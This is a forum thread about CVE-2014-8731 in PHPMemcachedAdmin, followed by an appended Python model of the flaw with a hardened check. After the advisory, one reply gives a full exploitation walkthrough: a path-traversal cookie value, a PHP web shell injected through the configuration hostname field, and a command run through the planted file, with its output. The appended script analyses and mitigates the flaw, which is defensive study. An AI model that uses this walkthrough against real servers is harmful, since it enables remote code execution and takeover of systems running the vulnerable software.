akkiliON
Posted November 13, 2014

CVE-2014-8731
CVSSv2 Vector: [AV:N/AC:L/Au:N/C:C/I:C/A:C/E:F/RL:U/RC:C]
CVSSv2 Base Score = 10.0
CVSSv2 Temp Score = 9.5
OWASP Top 10 classification: A1 - Injection

PHPMemcachedAdmin is a web-based frontend for Linux's memcached daemon.
Project Homepage: https://code.google.com/p/phpmemcacheadmin/
Download Site: http://blog.elijaa.org/index.php?pages/phpMemcachedAdmin-Download

PHPMemcachedAdmin stores data in the server's filesystem. Part of the serialized data and the last part of the concatenated filename may be specified by the user, which can lead to remote code execution, e.g. if a PHP script is created and placed within the webserver's document root.

All versions prior to and including the current version 1.2.2 are affected as far as we know.

Source: PHPMemcachedAdmin 1.2.2 Remote Code Execution - Packet Storm
SirGod
Posted November 13, 2014

How can I use it?

It is not an exploit, it is an advisory (few details are published at the moment). However, we can check for ourselves.

Let's take a look at stats.php:

if(!isset($_COOKIE['live_stats_id' . $hash]))
{
    ...
}
else
{
    # Backup from a previous request
    $live_stats_id = $_COOKIE['live_stats_id' . $hash];
}

If the 'live_stats_id' . $hash cookie is not set, it is created (with values that we can change). Take a look here. $hash is:

$hash = md5($_GET['cluster']);

and cluster is a variable that we can simply set via a GET request:

if(isset($_GET['cluster']) && ($_GET['cluster'] != null))
{
    $cluster = $_GET['cluster'];
}

So, if we set the $cluster variable to test, the cookie name should become:

live_stats_id098f6bcd4621d373cade4e832627b4f6

Then we can see that the $live_stats_id variable, which can be controlled by us, is concatenated to the end of the $file_path variable:

$file_path = rtrim($_ini->get('file_path'), '/') . DIRECTORY_SEPARATOR . 'live_stats.' . $live_stats_id;

The $file_path variable will become:

Temp/live_stats.1022488408098f6bcd4621d373cade4e832627b4f6

We can change the cookie value to "/../../rce.php", so $file_path will become:

Temp/live_stats./../../rce.php

Then we can see that a file called rce.php has been created in the root directory.

Now we must write code that allows us to execute commands. We go to "Edit configuration" (http://127.0.0.1/configure.php) and set this code as the hostname (of course, you can use any PHP code you want):

<?php system($_GET['cmd']);?>

Then save the configuration. Now all you have to do is execute your command (example):

http://127.0.0.1/rce.php?cmd=whoami

And you'll get:

a:1:{s:33:"www-data :123";a:1:{s:10:"query_time";i:1;}}

Have fun, I hope you learned something.
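The following Python script is an added, offline model of the path construction SirGod walks through above; it is not code from PHPMemcachedAdmin or from the post's author. It reproduces the cookie-name derivation (`'live_stats_id' . md5($_GET['cluster'])`) and the unchecked `$file_path` concatenation lexically, shows where the `/../../rce.php` cookie value makes the write land, and contrasts it with a hardened variant that allowlists the id format and confines the resolved path to the Temp directory. The deployment layout (`/var/www/html` as document root, `/var/www/html/Temp` as the `file_path` setting) and the allowlist pattern for a legitimate id are assumptions for the example, not values taken from the project. The configure.php form field names are not given in the post, so the payload-upload step is not modelled.

```python
"""
Offline model of the stats.php cookie/path handling described in the post.
Added example; not the project's own code and not the post author's.
Assumed layout (hypothetical): document root /var/www/html, Temp under it.
"""
import hashlib
import posixpath
import re

DOC_ROOT = "/var/www/html"          # assumed webserver document root
TEMP_DIR = DOC_ROOT + "/Temp"       # assumed value of the 'file_path' setting


def cookie_name(cluster: str) -> str:
    """stats.php names the cookie 'live_stats_id' . md5($_GET['cluster'])."""
    return "live_stats_id" + hashlib.md5(cluster.encode()).hexdigest()


def vulnerable_file_path(temp_dir: str, live_stats_id: str) -> str:
    """Mirrors rtrim(file_path, '/') . '/' . 'live_stats.' . $live_stats_id,
    i.e. the cookie value is appended without any validation."""
    return temp_dir.rstrip("/") + "/" + "live_stats." + live_stats_id


def resolved_target(temp_dir: str, live_stats_id: str) -> str:
    """Lexical normalisation of the concatenated path: what the '..'
    components collapse to (pure string model, no filesystem access)."""
    return posixpath.normpath(vulnerable_file_path(temp_dir, live_stats_id))


def escapes_temp_dir(temp_dir: str, live_stats_id: str) -> bool:
    """True when the resolved path lands outside the Temp directory."""
    base = posixpath.normpath(temp_dir)
    target = resolved_target(temp_dir, live_stats_id)
    return not (target == base or target.startswith(base + "/"))


def traversal_cookie(cluster: str, target_relpath: str) -> tuple:
    """(name, value) of the cookie used in the post: with '/../../rce.php'
    the write climbs out of Temp and lands one level above it."""
    return cookie_name(cluster), target_relpath


# Hardened variant. The id the application generates looks like a run of
# digits followed by the 32-hex md5 of the cluster name (as in the post's
# example value), so accept only that shape. This allowlist is an assumption
# for the example, not the project's own fix; the path containment check is
# kept as a second line of defence.
SAFE_ID = re.compile(r"^[0-9]{1,20}[0-9a-f]{32}$")


def hardened_file_path(temp_dir: str, live_stats_id: str) -> str:
    """Reject anything that is not a well-formed id or that leaves Temp."""
    if not SAFE_ID.fullmatch(live_stats_id):
        raise ValueError("rejected live_stats_id: %r" % live_stats_id)
    path = vulnerable_file_path(temp_dir, live_stats_id)
    if escapes_temp_dir(temp_dir, live_stats_id):
        raise ValueError("path escapes Temp directory: %r" % path)
    return path


if __name__ == "__main__":
    name, value = traversal_cookie("test", "/../../rce.php")
    print("cookie:          %s=%s" % (name, value))
    print("vulnerable path: %s" % vulnerable_file_path(TEMP_DIR, value))
    print("resolves to:     %s" % resolved_target(TEMP_DIR, value))
    try:
        hardened_file_path(TEMP_DIR, value)
    except ValueError as err:
        print("hardened:        %s" % err)
```

With the assumed layout, the traversal value resolves to `/var/www/html/rce.php`, which is the document root SirGod calls the "root directory"; a legitimate id such as `1022488408098f6bcd4621d373cade4e832627b4f6` passes the hardened check unchanged, while the traversal value is rejected by the allowlist before the path is ever built.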